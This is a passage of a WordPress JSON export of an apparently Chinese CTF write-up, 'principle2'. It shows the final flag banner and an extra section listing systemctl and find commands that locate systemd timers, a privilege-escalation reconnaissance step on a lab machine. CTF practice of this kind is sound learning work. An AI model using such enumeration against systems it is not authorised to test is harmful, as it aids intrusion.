0\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\n\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2819\u28bf\u28ff\u2844\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28b0\u28ff\u287f\u280b\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\n\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28e0\u28e4\u2836\u2836\u2836\u2830\u2826\u28e4\u28c0\u2800\u2819\u28f7\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28a0\u287f\u280b\u2880\u28c0\u28e4\u28b4\u2806\u2832\u2836\u2836\u28e4\u28c4\u2800\u2800\u2800\u2800\u2800\u2800\u2800\n\u2800\u2818\u28c6\u2800\u2800\u28a0\u28fe\u28eb\u28f6\u28fe\u28ff\u28ff\u28ff\u28ff\u28f7\u28ef\u28ff\u28e6\u2808\u2803\u2847\u2800\u2800\u2800\u2800\u28b8\u2818\u2881\u28f6\u28ff\u28f5\u28fe\u28ff\u28ff\u28ff\u28ff\u28f7\u28e6\u28dd\u28f7\u2844\u2800\u2800\u2870\u2802\u2800\n\u2800\u2800\u28e8\u28f7\u28f6\u28ff\u28e7\u28db\u28db\u283f\u283f\u28ff\u28bf\u28ff\u28ff\u28db\u28ff\u287f\u2800\u2800\u2847\u2800\u2800\u2800\u2800\u28b8\u2800\u2808\u28bf\u28df\u28db\u283f\u28bf\u287f\u28bf\u28bf\u28bf\u28db\u28eb\u28fc\u287f\u28f6\u28fe\u28c5\u2840\u2800\n\u2880\u287c\u280b\u2801\u2800\u2800\u2808\u2809\u281b\u281b\u283b\u281f\u2838\u281b\u280b\u2809\u2801\u2800\u2800\u28b8\u2847\u2800\u2800\u2804\u2800\u28b8\u2844\u2800\u2800\u2808\u2809\u2819\u281b\u2803\u283b\u281b\u281b\u281b\u2809\u2801\u2800\u2800\u2808\u2819\u28a7\u2840\n\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28ff\u2847\u28a0\u2800\u2800\u2800\u28b8\u28f7\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\n\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28fe\u28ff\u2847\u2800\u2800\u2800\u2800\u28b8\u28ff\u28f7\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\n\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28f0\u281f\u2801\u28ff\u2807\u2800\u2800\u2800\u2800\u28b8\u2847\u2819\u28bf\u28c6\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\n\u2800\u2830\u28c4\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28e0\u28fe\u2816\u287e\u2801\u2800\u2800\u28ff\u2800\u2800\u2800\u2800\u2800\u2818\u28ff\u2800\u2800\u2819\u2847\u28b8\u28f7\u28c4\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28f0\u2804\u2800\n\u2800\u2800\u28bb\u28f7\u2866\u28e4\u28e4\u28e4\u2874\u2836\u283f\u281b\u2809\u2801\u2800\u28b3\u2800\u28a0\u2840\u28bf\u28c0\u2800\u2800\u2800\u2800\u28e0\u285f\u2880\u28c0\u28a0\u2807\u2800\u2808\u2819\u281b\u2837\u2836\u28a6\u28e4\u28e4\u28e4\u28b4\u28fe\u284f\u2800\u2800\n\u2800\u2800\u2808\u28ff\u28e7\u2819\u28ff\u28f7\u28c4\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2818\u281b\u288a\u28d9\u281b\u2812\u2812\u289b\u28cb\u285a\u281b\u2809\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28e0\u28ff\u287f\u2801\u28fe\u287f\u2800\u2800\u2800\n\u2800\u2800\u2800\u2818\u28ff\u28c7\u2808\u28bf\u28ff\u28e6\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28f0\u28ff\u28ff\u28ff\u287f\u28bf\u28ff\u28ff\u28ff\u28c6\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28fc\u28ff\u285f\u2801\u28fc\u287f\u2801\u2800\u2800\u2800\n\u2800\u2800\u2800\u2800\u2818\u28ff\u28e6\u2800\u283b\u28ff\u28f7\u28e6\u28e4\u28e4\u28f6\u28f6\u28f6\u28ff\u28ff\u28ff\u28ff\u280f\u2800\u2800\u283b\u28ff\u28ff\u28ff\u28ff\u28f6\u28f6\u28f6\u28e6\u28e4\u28f4\u28ff\u28ff\u280f\u2880\u28fc\u287f\u2801\u2800\u2800\u2800\u2800\n\u2800\u2800\u2800\u2800\u2800\u2818\u28bf\u28f7\u28c4\u2819\u283b\u283f\u283f\u283f\u283f\u283f\u28bf\u28ff\u28ff\u28ff\u28c1\u28c0\u28c0\u28c0\u28c0\u28d9\u28ff\u28ff\u28ff\u283f\u283f\u283f\u283f\u283f\u283f\u281f\u2801\u28e0\u28ff\u287f\u2801\u2800\u2800\u2800\u2800\u2800\n\u2800\u2800\u2800\u2800\u2800\u2800\u2808\u283b\u28ef\u2819\u28a6\u28c0\u2800\u2800\u2800\u2800\u2800\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2800\u2800\u2800\u2800\u2800\u28e0\u2834\u288b\u28fe\u281f\u2800\u2800\u2800\u2800\u2800\u2800\u2800\n\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2819\u28a7\u2840\u2808\u2809\u2812\u2800\u2800\u2800\u2800\u2800\u2800\u28c0\u2800\u2800\u2800\u2800\u2880\u2800\u2800\u2800\u2800\u2800\u2810\u2812\u2809\u2801\u2880\u287e\u2803\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\n\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2808\u2833\u28c4\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u283b\u28ff\u28ff\u28ff\u28ff\u280b\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28e0\u281f\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\n\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2818\u28a6\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28f8\u28ff\u28ff\u2847\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u2874\u2801\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\n\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28ff\u28ff\u28ff\u28ff\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u280b\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\n\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2810\u28ff\u28ff\u28ff\u28ff\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\n\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28ff\u28ff\u28ff\u287f\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\n\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28bb\u28ff\u28ff\u2847\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\n\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2838\u28ff\u28ff\u2803\u2800\u2800\u2800\n\nCONGRATULATIONS hacker!!\n\nThe flag is:\nYTY9wenm6TT8dgJ&amp;<\/code><\/pre>\n<h2>\u989d\u5916\u6536\u83b7<\/h2>\n<p>\u4f7f\u7528\u4ee5\u4e0b\u547d\u4ee4\u5bfb\u627e\u5b9a\u65f6\u89e6\u53d1\u7a0b\u5e8f\uff1a<\/p>\n<pre><code class=\"language-bash\">systemctl list-timers \nsystemctl status activity.service<\/code><\/pre>\n<p>\u8fd8\u6709\uff1a<\/p>\n<pre><code class=\"language-bash\">find \/ -name *.timer 2&gt;\/dev\/null\ncat \/etc\/systemd\/system\/activity.timer<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>principle2 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 172.20.10.4 &#8212; -A Open [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-493","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/493","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=493"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/493\/revisions"}],"predecessor-version":[{"id":494,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/493\/revisions\/494"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=493"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=493"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=493"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}